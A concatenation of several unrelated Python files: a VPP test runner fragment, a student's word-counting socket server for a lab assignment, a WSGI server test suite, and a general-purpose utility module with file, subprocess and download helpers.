:param errors: iterable errors
"""
for test, err in errors:
self.stream.writeln(double_line_delim)
self.stream.writeln("%s: %s" %
(flavour, self.getDescription(test)))
self.stream.writeln(single_line_delim)
self.stream.writeln("%s" % err)
class VppTestRunner(unittest.TextTestRunner):
"""
A basic test runner implementation which prints results to standard error.
"""
@property
def resultclass(self):
"""Class maintaining the results of the tests"""
return VppTestResult
def __init__(self, keep_alive_pipe=None, descriptions=True, verbosity=1,
result_pipe=None, failfast=False, buffer=False,
resultclass=None, print_summary=True, **kwargs):
# ignore stream setting here, use hard-coded stdout to be in sync
# with prints from VppTestCase methods ...
super(VppTestRunner, self).__init__(sys.stdout, descriptions,
verbosity, failfast, buffer,
resultclass, **kwargs)
KeepAliveReporter.pipe = keep_alive_pipe
self.orig_stream = self.stream
self.resultclass.test_framework_result_pipe = result_pipe
self.print_summary = print_summary
def _makeResult(self):
return self.resultclass(self.stream,
self.descriptions,
self.verbosity,
self)
def run(self, test):
"""
Run the tests
:param test:
"""
faulthandler.enable() # emit stack trace to stderr if killed by signal
result = super(VppTestRunner, self).run(test)
if not self.print_summary:
self.stream = self.orig_stream
result.stream = self.orig_stream
return result
class Worker(Thread):
def __init__(self, executable_args, logger, env=None, *args, **kwargs):
super(Worker, self).__init__(*args, **kwargs)
self.logger = logger
self.args = executable_args
if hasattr(self, 'testcase') and self.testcase.debug_all:
if self.testcase.debug_gdbserver:
self.args = ['/usr/bin/gdbserver', 'localhost:{port}'
.format(port=self.testcase.gdbserver_port)] + args
elif self.testcase.debug_gdb and hasattr(self, 'wait_for_gdb'):
self.args.append(self.wait_for_gdb)
self.app_bin = executable_args[0]
self.app_name = os.path.basename(self.app_bin)
if hasattr(self, 'role'):
self.app_name += ' {role}'.format(role=self.role)
self.process = None
self.result = None
env = {} if env is None else env
self.env = copy.deepcopy(env)
def wait_for_enter(self):
if not hasattr(self, 'testcase'):
return
if self.testcase.debug_all and self.testcase.debug_gdbserver:
print()
print(double_line_delim)
print("Spawned GDB Server for '{app}' with PID: {pid}"
.format(app=self.app_name, pid=self.process.pid))
elif self.testcase.debug_all and self.testcase.debug_gdb:
print()
print(double_line_delim)
print("Spawned '{app}' with PID: {pid}"
.format(app=self.app_name, pid=self.process.pid))
else:
return
print(single_line_delim)
print("You can debug '{app}' using:".format(app=self.app_name))
if self.testcase.debug_gdbserver:
print("sudo gdb " + self.app_bin +
" -ex 'target remote localhost:{port}'"
.format(port=self.testcase.gdbserver_port))
print("Now is the time to attach gdb by running the above "
"command, set up breakpoints etc., then resume from "
"within gdb by issuing the 'continue' command")
self.testcase.gdbserver_port += 1
elif self.testcase.debug_gdb:
print("sudo gdb " + self.app_bin +
" -ex 'attach {pid}'".format(pid=self.process.pid))
print("Now is the time to attach gdb by running the above "
"command and set up breakpoints etc., then resume from"
" within gdb by issuing the 'continue' command")
print(single_line_delim)
input("Press ENTER to continue running the testcase...")
def run(self):
executable = self.args[0]
if not os.path.exists(executable) or not os.access(
executable, os.F_OK | os.X_OK):
# Exit code that means some system file did not exist,
# could not be opened, or had some other kind of error.
self.result = os.EX_OSFILE
raise EnvironmentError(
"executable '%s' is not found or executable." % executable)
self.logger.debug("Running executable '{app}': '{cmd}'"
.format(app=self.app_name,
cmd=' '.join(self.args)))
env = os.environ.copy()
env.update(self.env)
env["CK_LOG_FILE_NAME"] = "-"
self.process = subprocess.Popen(
['stdbuf', '-o0', '-e0'] + self.args, shell=False, env=env,
preexec_fn=os.setpgrp, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.wait_for_enter()
out, err = self.process.communicate()
self.logger.debug("Finished running `{app}'".format(app=self.app_name))
self.logger.info("Return code is `%s'" % self.process.returncode)
self.logger.info(single_line_delim)
self.logger.info("Executable `{app}' wrote to stdout:"
.format(app=self.app_name))
self.logger.info(single_line_delim)
self.logger.info(out.decode('utf-8'))
self.logger.info(single_line_delim)
self.logger.info("Executable `{app}' wrote to stderr:"
.format(app=self.app_name))
self.logger.info(single_line_delim)
self.logger.info(err.decode('utf-8'))
self.logger.info(single_line_delim)
self.result = self.process.returncode
if __name__ == '__main__':
pass
|
ladoServidor.py
|
# Student: Rafael Pais Cardoso
# DRE: 116140788
# Assignment: Lab 2
# Server side
import socket
import json
import os
import auxiliarBase
import select
import sys
import threading
HOST = ''  # '' makes the server reachable on any address of the local machine
PORTA = 5000  # port on which messages for this application will arrive
SEPARADORES = [" ",",",".","!","?",":","/","\\",";","(",")","[","]","{","}"]
# list of I/O sources of interest (already includes standard input)
entradas = [sys.stdin]
# stores the history of connections
conexoes = {}
def NormalizaTexto(texto):
return texto.lower()
def NormalizaJson(mensagem_json):
    '''Lower-cases the file name and the word being searched for
    Input: message in json format
    Output: '''
mensagem_json["arquivo"] = NormalizaTexto(mensagem_json["arquivo"])
mensagem_json["palavra"] = NormalizaTexto(mensagem_json["palavra"])
def NomeDaPalavraValido(mensagem_json):
    '''Checks whether the word is valid
    Input: message in json format
    Output: False when the word is invalid, True when it is valid'''
if not mensagem_json["palavra"] or mensagem_json["palavra"].isspace():
mensagem_json["sucesso"] = False
mensagem_json["mensagemErro"] = "Palavra inválida"
return False
else:
return True
def normalizacaoTokenizacao(dados):
    '''Removes the separators and lower-cases the words
    Input: the text file contents
    Output: the text with lower-cased words and without the separators'''
for delimitador in SEPARADORES:
dados = dados.lower().replace(delimitador, " ")
return dados
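# Illustrative example (sketch):
#
#   normalizacaoTokenizacao("Ola, Mundo!")  # -> "ola  mundo "
#
# every separator becomes a space and all letters are lower-cased.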
def ContaPalavrasDoArquivo(mensagem_json):
    '''Counts the number of occurrences of the word in the file and updates the message
    Input: message in json format
    Output: '''
mensagem = 'Lendo o arquivo {nomeArquivo} e contando o número de ocorrências da palavra {nomePalavra}.'
print(mensagem.format(nomeArquivo = mensagem_json["arquivo"], nomePalavra = mensagem_json["palavra"]))
contador = 0
dados = auxiliarBase.LeArquivo(mensagem_json)
dados = normalizacaoTokenizacao(dados)
listaPalavras = dados.split()
    for palavra in listaPalavras:
        if palavra == mensagem_json["palavra"]:
            contador += 1
mensagem_json["contagem"] = contador
mensagem_json["sucesso"] = True
def IniciaServidor():
    '''Creates a server socket and puts it in listening mode
    Output: the created socket'''
    # create the socket
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # Internet (IPv4 + TCP)
print('Servidor estabelecido.')
    # bind the server to its address
sock.bind((HOST, PORTA))
    # start listening for connections
sock.listen(5)
    # set the socket to non-blocking mode
sock.setblocking(False)
    # add the main socket to the list of inputs of interest
entradas.append(sock)
return sock
def AceitaConexao(sock):
    '''Accepts a connection request from a client
    Input: the server socket
    Output: the new connection socket and the client address'''
    # accept the connection from the next client
    clisock, endr = sock.accept()
    # record the new connection
conexoes[clisock] = endr
return clisock, endr
def AtendeRequisicoes(clisock, endr):
    '''Receives messages and sends the results back to the client (until the client finishes)
    Input: the connection socket and the client address
    Output: '''
while True:
        # receive data from the client
        mensagemRecebida = clisock.recv(1024)  # the argument is the maximum amount of data to read
        if not mensagemRecebida:  # empty data: the client has closed the connection
print(str(endr) + '-> encerrou')
            clisock.close()  # close the connection with the client
return
        json_obj_recv = json.loads(str(mensagemRecebida, encoding='utf-8'))  # parse the json
        # normalize the file name and the word to be searched in the text
NormalizaJson(json_obj_recv)
        # check whether the file name is valid; if it is not, return an error message to the client
if(not auxiliarBase.NomeDoArquivoValido(json_obj_recv)):
clisock.send(bytes(json.dumps(json_obj_recv), encoding='utf-8'))
continue
        # check whether the file path is valid; if it is not, return an error message to the client
if(not auxiliarBase.CaminhoDoArquivoValido(json_obj_recv)):
clisock.send(bytes(json.dumps(json_obj_recv), encoding='utf-8'))
continue
        # check whether the word is valid; if it is not, return an error message to the client
if(not NomeDaPalavraValido(json_obj_recv)):
clisock.send(bytes(json.dumps(json_obj_recv), encoding='utf-8'))
continue
ContaPalavrasDoArquivo(json_obj_recv)
        # send the reply message to the client
print('Processamento concluído. Enviado mensagem para o cliente.')
clisock.send(bytes(json.dumps(json_obj_recv), encoding='utf-8'))
def Main():
    '''Initializes the server and runs its main (infinite) loop'''
    clientes = []  # stores the created threads so they can be joined later
sock = IniciaServidor()
print("Pronto para receber conexoes...")
print("Comandos basicos do servidor: \n'fim' para finalizar o servidor quando nao existir clientes ativos; \n'historico' para listar o historico de conexoes; \n'ativos' para listar os clientes ainda ativos")
while(True):
        # wait for any input of interest
leitura, escrita, excecao = select.select(entradas, [], [])
        # handle all the ready inputs
for pronto in leitura:
            if pronto == sock:  # new connection request
clisock, endr = AceitaConexao(sock)
print ('Conectado com: ', endr)
                # create a new thread to serve the client
cliente = threading.Thread(target=AtendeRequisicoes, args=(clisock,endr))
cliente.start()
                clientes.append(cliente)  # keep the thread reference to use with join()
            elif pronto == sys.stdin:  # standard input
cmd = input()
                if cmd == 'fim':  # request to shut the server down
                    for c in clientes:  # wait for all threads to finish
c.join()
sock.close()
sys.exit()
                elif cmd == 'historico':  # show the history of connections
mensagem = 'Historico de conexoes: {historicoConexoes}.'
print(mensagem.format(historicoConexoes = str(conexoes.values())))
                elif cmd == 'ativos':  # show the number of active client threads
mensagem = 'Clientes ativos: {clientesAtivos}.'
print(mensagem.format(clientesAtivos = str(threading.active_count() - 1)))
Main()
|
test_all_ctrls_wsgi.py
|
# coding: utf-8
import os
from typing import Dict
import unittest
from threading import Thread
from time import sleep
import urllib.request
import urllib.error
import http.client
from wsgiref.simple_server import WSGIServer, make_server
from simple_http_server.logger import get_logger, set_level
import simple_http_server.server as server
set_level("DEBUG")
_logger = get_logger("wsgi_test")
class WSGIHttpRequestTest(unittest.TestCase):
PORT = 9092
WAIT_COUNT = 10
httpd: WSGIServer = None
server_ready = False
@classmethod
def start_server(cls):
_logger.info("start server in background. ")
root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
server.scan(project_dir=root, base_dir="tests/ctrls", regx=r'.*controllers.*')
wsgi_proxy = server.init_wsgi_proxy(resources={"/public/*": f"{root}/tests/static"})
def wsgi_simple_app(environment, start_response):
return wsgi_proxy.app_proxy(environment, start_response)
cls.httpd = make_server("", cls.PORT, wsgi_simple_app)
cls.server_ready = True
cls.httpd.serve_forever()
@classmethod
def setUpClass(cls):
Thread(target=cls.start_server, daemon=False, name="t").start()
retry = 0
while not cls.server_ready:
sleep(1)
retry = retry + 1
_logger.info(f"server is not ready wait. {retry}/{cls.WAIT_COUNT} ")
if retry >= cls.WAIT_COUNT:
raise Exception("Server start wait timeout.")
@classmethod
def tearDownClass(cls):
try:
cls.httpd.shutdown()
except:
pass
@classmethod
def visit(cls, ctx_path, headers: Dict[str, str] = {}, data=None, return_type: str = "TEXT"):
req: urllib.request.Request = urllib.request.Request(f"http://127.0.0.1:{cls.PORT}/{ctx_path}")
for k, v in headers.items():
req.add_header(k, v)
res: http.client.HTTPResponse = urllib.request.urlopen(req, data=data)
if return_type == "RESPONSE":
return res
elif return_type == "HEADERS":
headers = res.headers
res.close()
return headers
else:
txt = res.read().decode("utf-8")
res.close()
return txt
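    # visit() returns the decoded response body by default; pass
    # return_type="RESPONSE" for the raw HTTPResponse object or
    # return_type="HEADERS" for just the response headers.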
def test_header_echo(self):
res: http.client.HTTPResponse = self.visit(f"header_echo", headers={"X-KJ-ABC": "my-headers"}, return_type="RESPONSE")
assert "X-Kj-Abc" in res.headers
assert res.headers["X-Kj-Abc"] == "my-headers"
def test_static(self):
txt = self.visit("public/a.txt")
assert txt == "hello world!"
def test_path_value(self):
pval = "abc"
path_val = "xyz"
txt = self.visit(f"path_values/{pval}/{path_val}/x")
assert txt == f"<html><body>{pval}, {path_val}</body></html>"
def test_error(self):
try:
self.visit("error")
except urllib.error.HTTPError as err:
assert err.code == 400
error_msg = err.read().decode("utf-8")
_logger.info(error_msg)
assert error_msg == "code:400, message: Parameter Error!, explain: Test Parameter Error!"
def test_exception(self):
try:
self.visit("exception")
except urllib.error.HTTPError as err:
assert err.code == 500
error_msg = err.read().decode("utf-8")
_logger.info(error_msg)
assert error_msg == '500-Internal Server Error-some error occurs!'
|
lib.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""General purpose functions, not directly linked to clk"""
import datetime
import difflib
import functools
import getpass
import hashlib
import heapq
import itertools
import json
import os
import platform
import re
import shlex
import shutil
import signal
import subprocess
import sys
import tempfile
import threading
import time
import traceback
from contextlib import contextmanager
from copy import deepcopy
from pathlib import Path
from urllib.request import urlopen
import click
import colorama
import glob2
from click._termui_impl import ProgressBar as ProgressBar_
from click_completion import DocumentedChoice
from clk.click_helpers import click_get_current_context_safe
from clk.log import get_logger
LOGGER = get_logger(__name__)
dry_run = None
main_module = None
DocumentedChoice = DocumentedChoice
def read_properties_file(file_name):
return dict([line.strip().split('=') for line in open(file_name, 'r').readlines() if '=' in line])
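# Illustrative example (sketch): a properties file containing the line
# "key=value" yields {'key': 'value'}; lines without '=' are skipped.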
def ensure_unicode(value):
"""Convert a string in unicode"""
if not isinstance(value, str):
return value.decode('utf-8')
else:
return value
def ln(src, link_name):
"""Create a symbolink link link_name -> src"""
if isinstance(src, Path):
src = str(src)
if isinstance(link_name, Path):
link_name = str(link_name)
LOGGER.action('create symlink {} -> {}'.format(link_name, src))
if not dry_run:
os.symlink(src, link_name)
def makedirs(dir):
"""Ensure a directory is created.
Possibly create the parent directories. If the directory already exists, do
nothing.
"""
if not os.path.exists(dir):
LOGGER.action('create directory {}'.format(dir))
if not dry_run:
os.makedirs(dir)
return Path(dir)
_makedirs = makedirs
def chmod(file, mode):
"""Change the mode bits of a file"""
LOGGER.action('chmod {} to {}'.format(file, oct(mode)))
if not dry_run:
os.chmod(file, mode)
def move(src, dst):
"""Rename src into dst
See shutil.move
"""
LOGGER.action('Move {} to {}'.format(src, dst))
if not dry_run:
shutil.move(src, dst)
def createfile(name, content, append=False, internal=False, force=False, makedirs=False, mode=None):
if os.path.exists(name) and not force:
        raise click.UsageError(f'{name} already exists')
if makedirs:
_makedirs(Path(name).parent)
if internal:
logger = LOGGER.develop
else:
logger = LOGGER.action
if append:
logger('appending to the file {}'.format(name))
else:
logger('writing to the file {}'.format(name))
if dry_run:
logger('with content {}'.format(content))
else:
flag = 'a' if append else 'w'
flag += 'b'
open(name, flag).write(content.encode('utf-8'))
if mode:
chmod(name, mode)
return Path(name)
def copy(src, dst):
if isinstance(src, Path):
src = str(src)
if isinstance(dst, Path):
dst = str(dst)
LOGGER.action('copy {} to {}'.format(src, dst))
if dry_run:
return
if os.path.isdir(src):
shutil.copytree(src, dst)
else:
shutil.copy(src, dst)
def link(src, dst):
if platform.system() == 'Windows':
return copy(src, dst)
LOGGER.action('hard link {} to {}'.format(src, dst))
if dry_run:
return
os.link(src, dst)
def rm(*file_or_tree):
LOGGER.action('remove {}'.format(' '.join(map(str, file_or_tree))))
if dry_run:
return
for f in file_or_tree:
if os.path.isdir(f) and not os.path.islink(f):
shutil.rmtree(f)
else:
os.unlink(f)
# expose find_executable as which
def which(executable, path=None):
"""Tries to find 'executable' in the directories listed in 'path'.
    'path' is a string of directories separated by 'os.pathsep'; it defaults
    to os.environ['PATH']. Returns the complete filename or None if not found.
"""
if path is None:
path = os.environ['PATH']
paths = path.split(os.pathsep)
base, ext = os.path.splitext(executable)
exts = ['']
if (sys.platform == 'win32' or os.name == 'os2') and (ext != '.exe'):
exts = ['.cmd', '.bat', '.exe', '.com'] + exts
for ext in exts:
e = executable + ext
if os.path.isfile(e):
return e
else:
for p in paths:
f = os.path.join(p, e)
if os.path.isfile(f):
# the file exists, we have a shot at spawn working
return f
return None
# expose glob
@functools.wraps(glob2.glob)
def glob(pathname, *args, **kwargs):
if isinstance(pathname, Path):
pathname = str(pathname)
return glob2.glob(pathname, *args, **kwargs)
def glob_first(expr, default=None):
"""Return the first result of the globbing expression or 'default'"""
res = glob(expr)
return res[0] if res else default
def main_default(**default_options):
u"""Change the default values of the main method of a Command"""
def decorator(f):
oldmain = f.main
def main(*args, **options):
LOGGER.develop('Calling with args: {}'.format(args))
newopts = dict(default_options)
newopts.update(options)
oldmain(*args, **newopts)
f.main = main
return f
return decorator
def get_all_files_recursive(dir, exclude):
for dir, subdirs, files in os.walk(dir):
for excluded in set(exclude) & set(subdirs):
del subdirs[subdirs.index(excluded)]
for file in files:
yield os.path.join(dir, file)
def check_uptodate(src, dst, src_exclude=[], dst_exclude=[]):
assert os.path.exists(src), u'{} must exist'.format(src)
if not os.path.exists(dst):
return False
if os.path.isfile(src):
src_mtime = os.stat(src).st_mtime
src_f = src
elif os.path.isdir(src):
src_mtime, src_f = max(map(lambda f: (os.stat(f).st_mtime, f), get_all_files_recursive(src, src_exclude)),
key=lambda e: e[0])
else:
raise NotImplementedError
if os.path.isfile(dst):
dst_mtime = os.stat(dst).st_mtime
dst_f = dst
elif os.path.isdir(dst):
dst_mtime, dst_f = min(map(lambda f: (os.stat(f).st_mtime, f), get_all_files_recursive(dst, dst_exclude)),
key=lambda e: e[0])
else:
raise NotImplementedError
LOGGER.debug(u'Comparing mtimes of {} ({}) with {} ({})'.format(
src_f,
src_mtime,
dst_f,
dst_mtime,
))
return src_mtime < dst_mtime
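# Illustrative sketch (not part of the original module): check_uptodate compares
# the newest mtime under `src` with the oldest mtime under `dst` and returns True
# only when the destination is already newer, i.e. nothing needs to be rebuilt.
# The file names below are hypothetical and the mtimes are set explicitly so the
# outcome does not depend on filesystem timestamp resolution.
def _example_check_uptodate():
    with tempdir() as d:
        src = d / 'source.txt'
        dst = d / 'generated.txt'
        createfile(src, 'input')
        createfile(dst, 'output')
        os.utime(src, (1000000, 1000000))   # older source
        os.utime(dst, (2000000, 2000000))   # newer destination
        assert check_uptodate(src, dst) is True
        os.utime(dst, (500000, 500000))     # destination now older than the source
        assert check_uptodate(src, dst) is False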
def call(args, **kwargs):
u"""Run a program and deal with debugging and signals"""
internal = kwargs.get('internal')
if 'internal' in kwargs.keys():
del kwargs['internal']
# deal with backward compatibility
if 'force' in kwargs.keys():
LOGGER.deprecated("'force' argument is deprecated since version 0.9.0, use 'internal' instead.")
internal = kwargs['force']
del kwargs['force']
launcher = kwargs.get('launcher_command')
if 'launcher_command' in kwargs.keys():
del kwargs['launcher_command']
args = [str(arg) for arg in args]
if launcher:
args = launcher + args
args = [str(arg) for arg in args]
message = ' '.join(quote(arg) for arg in args)
action_message = 'run: {}'.format(message)
cwd = kwargs.get('cwd')
if cwd:
action_message = 'in %s, %s' % (cwd, action_message)
if internal:
LOGGER.develop(action_message)
else:
LOGGER.action(action_message)
if not dry_run or internal:
_call(args, kwargs)
call_capture_stdout = False
call_merge_stdout_and_stderr = False
def _call(args, kwargs):
signal_hook = kwargs.pop('signal_hook', None)
def signal_handler(num, stack):
if signal_hook:
signal_hook(p, num, stack)
else:
os.kill(p.pid, num)
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
if call_merge_stdout_and_stderr:
kwargs['stderr'] = subprocess.STDOUT
if kwargs.pop('to_stderr', False):
kwargs['stdout'] = subprocess.PIPE
if call_capture_stdout:
kwargs['stdout'] = subprocess.PIPE
try:
if call_capture_stdout:
p = subprocess.Popen(args, **kwargs)
stdout = []
while True:
line = p.stdout.readline().decode('utf-8')
print(line[:-1])
stdout.append(line)
if line == u'' and p.poll() is not None:
break
p.wait()
if p.returncode != 0:
raise subprocess.CalledProcessError(p.returncode, args, output=stdout)
else:
p = subprocess.Popen(args, **kwargs)
p.wait()
if p.returncode:
raise subprocess.CalledProcessError(p.returncode, args)
except OSError as e:
raise click.ClickException(u'Failed to call %s: %s' % (args[0], e.strerror))
finally:
signal.signal(signal.SIGINT, signal.SIG_DFL)
signal.signal(signal.SIGTERM, signal.SIG_DFL)
def popen(args, internal=False, **kwargs):
"""Run a program and deal with debugging and signals"""
args = [str(arg) for arg in args]
message = ' '.join(quote(arg) for arg in args)
action_message = 'run: {}'.format(message)
if internal:
LOGGER.develop(action_message)
else:
LOGGER.action(action_message)
if not dry_run or internal:
return subprocess.Popen(args, **kwargs)
@contextmanager
def tempdir(dir=None):
u"""Create a temporary to use be in a with statement"""
d = Path(tempfile.mkdtemp(dir=dir))
LOGGER.action(f'Creating a temporary directory at {d}')
try:
yield d
except Exception:
rm(d)
raise
rm(d)
@contextmanager
def temporary_file(dir=None, suffix=None, nameonly=False, content=None):
u"""Create a temporary file to use in a with statement"""
d = tempfile.NamedTemporaryFile(delete=nameonly, suffix=suffix)
if content is not None:
if not isinstance(content, bytes):
content = content.encode('utf8')
d.write(content)
if nameonly or content is not None:
d.close()
LOGGER.action(f'Creating a temporary file at {d.name}')
try:
yield d
except Exception:
if os.path.exists(d.name):
rm(d.name)
raise
if os.path.exists(d.name):
rm(d.name)
@contextmanager
def cd(dir, internal=False, makedirs=False):
u"""Change to a directory temporarily. To be used in a with statement"""
if makedirs:
_makedirs(dir)
if internal:
logger = LOGGER.develop
else:
logger = LOGGER.action
prevdir = os.getcwd()
logger(u'go to directory {}'.format(dir))
if not dry_run:
os.chdir(dir)
LOGGER.debug(u'In directory {}'.format(dir))
yield os.path.realpath(dir)
logger(u'go back into directory {}'.format(prevdir))
if not dry_run:
LOGGER.debug('Back to directory {}'.format(prevdir))
os.chdir(prevdir)
def ccd(dir):
"""Create and change to a directory temporarily. To be used in a with statement"""
LOGGER.deprecated('`ccd(dir)` is deprecated, use `cd(dir, makedirs=True)` instead')
return cd(dir, makedirs=True)
@contextmanager
def updated_env(**kwargs):
u"""Temporarily update the environment. To be used in a with statement"""
oldenv = dict(os.environ)
for k, v in kwargs.items():
        if v is None:
            if k in os.environ:
                LOGGER.debug('environment %s removed' % k)
                del os.environ[k]
        else:
            LOGGER.debug('environment %s="%s"' % (k, v))
            os.environ[k] = v
yield
os.environ.clear()
os.environ.update(oldenv)
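# Illustrative sketch: updated_env temporarily overrides some environment
# variables (a value of None removes the variable) and restores the previous
# environment when the with block exits. The variable names are made up.
def _example_updated_env():
    os.environ['CLK_DEMO_KEPT'] = 'before'
    os.environ['CLK_DEMO_REMOVED'] = 'present'
    with updated_env(CLK_DEMO_KEPT='during', CLK_DEMO_REMOVED=None):
        assert os.environ['CLK_DEMO_KEPT'] == 'during'
        assert 'CLK_DEMO_REMOVED' not in os.environ
    assert os.environ['CLK_DEMO_KEPT'] == 'before'
    assert os.environ['CLK_DEMO_REMOVED'] == 'present'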
@contextmanager
def env(**kwargs):
u"""Temporarily override the environment. To be used in a with statement"""
oldenv = dict(os.environ)
os.environ.clear()
os.environ.update(kwargs)
yield
os.environ.clear()
os.environ.update(oldenv)
def format_opt(opt):
return u'--%s' % opt.replace(u'_', u'-')
def format_options(options, glue=False):
"""Transform the dictionary in a list of options usable in call"""
cmd = []
for opt, value in options.items():
if value is True:
cmd.append(format_opt(opt))
elif isinstance(value, list) or isinstance(value, tuple):
# this is a multi value option
for v in value:
if glue:
cmd.append('{}={}'.format(format_opt(opt), v))
else:
cmd.extend([format_opt(opt), v])
elif value:
if glue:
cmd.append('{}={}'.format(format_opt(opt), value))
else:
cmd.extend([format_opt(opt), value])
return cmd
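# Illustrative sketch: format_options turns a dictionary of option values into an
# argv-style list; True becomes a bare flag, lists become repeated options, and
# underscores in option names become dashes. The option names here are made up.
def _example_format_options():
    opts = {'dry_run': True, 'output': 'result.txt', 'define': ['a=1', 'b=2']}
    assert format_options(opts) == [
        '--dry-run', '--output', 'result.txt', '--define', 'a=1', '--define', 'b=2'
    ]
    assert format_options(opts, glue=True) == [
        '--dry-run', '--output=result.txt', '--define=a=1', '--define=b=2'
    ]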
def cpu_count():
try:
import psutil
return psutil.cpu_count(logical=False)
except ImportError:
import multiprocessing
return multiprocessing.cpu_count()
component_re = re.compile(r'(\d+ | [a-z]+ | \.| -)', re.VERBOSE)
replace = {'pre': 'c', 'preview': 'c', '-': 'final-', 'rc': 'c', 'dev': '@'}.get
def _parse_version_parts(s):
for part in component_re.split(s):
part = replace(part, part)
if not part or part == '.':
continue
if part[:1] in '0123456789':
yield part.zfill(8) # pad for numeric comparison
else:
yield '*' + part
yield '*final' # ensure that alpha/beta/candidate are before final
def parse_version(s):
"""Convert a version string to a chronologically-sortable key
This is a rough cross between distutils' StrictVersion and LooseVersion;
if you give it versions that would work with StrictVersion, then it behaves
the same; otherwise it acts like a slightly-smarter LooseVersion. It is
*possible* to create pathological version coding schemes that will fool
this parser, but they should be very rare in practice.
The returned value will be a tuple of strings. Numeric portions of the
version are padded to 8 digits so they will compare numerically, but
without relying on how numbers compare relative to strings. Dots are
dropped, but dashes are retained. Trailing zeros between alpha segments
or dashes are suppressed, so that e.g. "2.4.0" is considered the same as
"2.4". Alphanumeric parts are lower-cased.
The algorithm assumes that strings like "-" and any alpha string that
alphabetically follows "final" represents a "patch level". So, "2.4-1"
is assumed to be a branch or patch of "2.4", and therefore "2.4.1" is
considered newer than "2.4-1", which in turn is newer than "2.4".
Strings like "a", "b", "c", "alpha", "beta", "candidate" and so on (that
come before "final" alphabetically) are assumed to be pre-release versions,
so that the version "2.4" is considered newer than "2.4a1".
Finally, to handle miscellaneous cases, the strings "pre", "preview", and
"rc" are treated as if they were "c", i.e. as though they were release
candidates, and therefore are not as new as a version string that does not
contain them, and "dev" is replaced with an '@' so that it sorts lower than
than any other pre-release tag.
"""
parts = []
for part in _parse_version_parts(s.lower()):
if part.startswith('*'):
if part < '*final': # remove '-' before a prerelease tag
while parts and parts[-1] == '*final-':
parts.pop()
# remove trailing zeros from each series of numeric parts
while parts and parts[-1] == '00000000':
parts.pop()
parts.append(part)
return tuple(parts)
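# Illustrative sketch: the tuples returned by parse_version sort the way the
# docstring describes, so trailing zeros are ignored and pre-releases compare
# lower than the corresponding final release.
def _example_parse_version():
    assert parse_version('2.4') == parse_version('2.4.0')
    assert parse_version('2.4a1') < parse_version('2.4')
    assert parse_version('2.4') < parse_version('2.4-1') < parse_version('2.4.1')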
def safe_check_output(*args, **kwargs):
"""Return the process output or an empty string when the process fail and never raise"""
if 'stdout' in kwargs:
raise ValueError('stdout argument not allowed, it will be overridden.')
if 'stderr' not in kwargs:
kwargs['stderr'] = subprocess.PIPE
internal = kwargs.get('internal')
if 'internal' in kwargs:
del kwargs['internal']
# deal with backward compatibility
if 'force' in kwargs.keys():
LOGGER.deprecated("'force' argument is deprecated since version 0.9.0, use 'internal' instead.")
internal = kwargs['force']
del kwargs['force']
action_message = 'run: {}'.format(' '.join(args[0]))
if internal:
LOGGER.develop(action_message)
else:
LOGGER.action(action_message)
if dry_run and not internal:
return ''
try:
process = subprocess.Popen(stdout=subprocess.PIPE, *args, **kwargs)
output, _ = process.communicate()
if process.poll():
return ''
else:
return output.decode('utf-8')
except Exception:
return ''
def check_output(cmd, *args, **kwargs):
"""Return the process output"""
if isinstance(cmd, str):
cmd = shlex.split(cmd)
message = ' '.join(quote(str(arg)) for arg in cmd)
try:
nostderr = kwargs.pop('nostderr')
except KeyError:
nostderr = False
try:
internal = kwargs.pop('internal')
except KeyError:
internal = False
try:
safe = kwargs.pop('safe')
except KeyError:
safe = False
# deal with backward compatibility
if 'force' in kwargs.keys():
LOGGER.deprecated("'force' argument is deprecated since version 0.9.0, use 'internal' instead.")
internal = kwargs['force']
del kwargs['force']
action_message = 'run: {}'.format(message)
if internal:
LOGGER.develop(action_message)
else:
LOGGER.action(action_message)
if not (dry_run and not internal and not safe):
if call_capture_stdout:
kwargs['stderr'] = subprocess.PIPE
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(cmd, *args, **kwargs)
while True:
line = p.stderr.readline().decode('utf-8')
if not nostderr:
sys.stderr.write(line)
if line == u'' and p.poll() is not None:
break
p.wait()
stdout = p.stdout.read().decode('utf-8')
if p.returncode != 0:
raise subprocess.CalledProcessError(p.returncode, args, output=stdout)
return stdout
else:
if nostderr:
kwargs['stderr'] = subprocess.PIPE
return subprocess.check_output(cmd, *args, **kwargs).decode('utf-8')
def is_pip_install(src_dir):
try:
with cd(src_dir, internal=True):
pip_install = subprocess.Popen(['git', 'rev-parse'], stdout=subprocess.PIPE, stderr=subprocess.PIPE).wait()
# make sure that src_dir is actually in the project repository (and not in homebrew for example)
pip_install = pip_install or not safe_check_output(['git', 'ls-files'], internal=True)
except OSError:
pip_install = True
return pip_install
def get_netrc_keyring():
netrcfile = os.path.expanduser('~/.netrc')
if os.path.exists(netrcfile) and platform.system() != 'Windows':
chmod(netrcfile, 0o600)
from clk.keyring_netrc import NetrcKeyring
return NetrcKeyring()
def get_keyring():
try:
import keyring
except ModuleNotFoundError:
LOGGER.status('keyring is not installed `pip install keyring`. Falling back on netrc')
from clk.netrc import Netrc
return Netrc()
if isinstance(keyring.core.get_keyring(), keyring.backends.fail.Keyring):
LOGGER.debug('could not find a correct keyring backend, fallback on the netrc one')
from clk.keyring_netrc import NetrcKeyring
keyring.core.set_keyring(NetrcKeyring())
return keyring.core.get_keyring()
def extract(url, dest=Path('.')):
"""Download and extract all the files in the archive at url in dest"""
dest = Path(dest)
import tarfile
import zipfile
from io import BytesIO
makedirs(dest)
r = urlopen(url)
size = int(r.headers['Content-Length'] or r.headers['content-length'])
archname = os.path.basename(url)
archive = BytesIO()
with progressbar(length=size, label='Downloading %s' % archname) as bar:
chunk = r.read(1024)
while chunk:
archive.write(chunk)
bar.update(1024)
chunk = r.read(1024)
archive.seek(0)
if archname.endswith('.zip'):
zipfile.ZipFile(archive).extractall(path=dest)
else:
tarfile.open(fileobj=archive).extractall(dest)
def download(url, outdir=None, outfilename=None, mkdir=False, sha256=None, mode=None):
outdir = outdir or tempfile.mkdtemp()
outfilename = outfilename or os.path.basename(url)
if not os.path.exists(outdir) and mkdir:
makedirs(outdir)
outpath = os.path.join(outdir, outfilename)
LOGGER.action('download %s' % url)
if dry_run:
return outpath
r = urlopen(url)
size = int(r.headers['Content-Length'] or r.headers['content-length'])
